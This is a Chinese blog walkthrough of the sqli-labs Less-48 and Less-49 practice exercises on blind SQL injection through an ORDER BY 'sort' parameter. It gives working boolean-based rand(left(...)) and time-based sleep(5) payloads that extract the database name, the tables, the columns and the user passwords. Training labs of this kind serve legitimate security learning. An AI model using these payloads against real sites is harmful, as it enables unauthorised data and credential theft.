目录
三、Less48(GET-Error based -Blind - Numeric - ORDER BY CLAUSE)
四、Less49(GET-Error based - String - Blind ORDER BY CLAUSE)
一、推荐:
【SQL注入】堆叠注入https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501【SQL注入】数字型注入 & 字符型注入https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185%5Ev2%5Econtrol&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185%5Ev2%5Econtrol&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185%5Ev2%5Econtrol&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450
【SQL注入-无回显】布尔盲注:原理、函数、利用过程https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450【SQL注入-无回显】时间盲注:原理、函数、利用过程https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450
二、(手工)SQL注入基本步骤:
第一步:注入点测试
第二步:分析权限
第三步:判断字段数
第四步:爆数据库名
第五步:爆表名
第六步:爆字段名
第七步:爆数据
三、Less48(GET-Error based -Blind - Numeric - ORDER BY CLAUSE)
3.1、简介:(order by注入-盲注-GET注入)
请求方法:GET
方法:order by注入+盲注+数字型注入
3.1、第一步:注入点测试
按照提示输入?sort=1
输入'
页面不正常,说明存在注入点
没有报错,可以采取盲注(布尔盲注、时间盲注)
?sort=rand(true)
?sort=rand(false)
可以采取布尔盲注
3.3、第二步:分析过滤
方法一:
考虑一步一步将注入语句字符一个一个替换掉,直到不报错(浪费时间)
或者全部替换(如果报错,不知道哪里被过滤了)
方法二:
获取源码进行白盒审计(最优)
3.4、第三步:判断字段数/回显位
?sort=3
回显正常
?sort=4
报错
说明有3个字段
3.5、第四步:暴库
?sort=rand(left(database(),1)>'s')
得到的结果与rand(false)相同
说明这个条件错误
最后推出
?sort=rand(left(database(),1)='s')
与rand(true)结果相同
说明条件正确
得到第一个字符是s
以此类推得到security
(通过改变判断的位置)
或者(时间盲注)
?sort=1 and if(substr(database(),1,1)='s',sleep(5),0)
3.6、第五步:爆表名
?sort=rand(left((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)>'e')
得到的结果与rand(false)相同
说明这个条件错误
?sort=rand(left((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)='e')
与rand(ture)返回相同
说明条件正确
分别挨个推出表
emails referers uagents users
或者(时间盲注)
?sort=1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)
3.7、第六步:爆字段
?sort=rand(left((select group_concat(column_name) from information_schema.columns where table_name='users'),1)>'u')
得到的结果与rand(false)相同
说明这个条件错误
?sort=rand(left((select group_concat(column_name) from information_schema.columns where table_name='users'),1)='u')
与rand(ture)返回相同
说明条件正确
依此类推得到字段
或者(时间盲注)
?sort=1 and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',sleep(5),0)
3.9、第八步:爆数据
?sort=rand(left((select group_concat(password) from security.users),1)>'1')
得到的结果与rand(false)相同
说明这个条件错误
?sort=rand(left((select group_concat(password) from security.users),1)='1')
与rand(ture)返回相同
说明条件正确
或者(时间盲注)
?sort=1 and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',sleep(5),0)
四、Less49(GET-Error based - String - Blind ORDER BY CLAUSE)
4.1、简介:(order by注入-盲注-GET注入)
请求方法:GET
方法:order by注入+盲注+字符型注入
4.2、利用:
与Less48相比
需要闭合'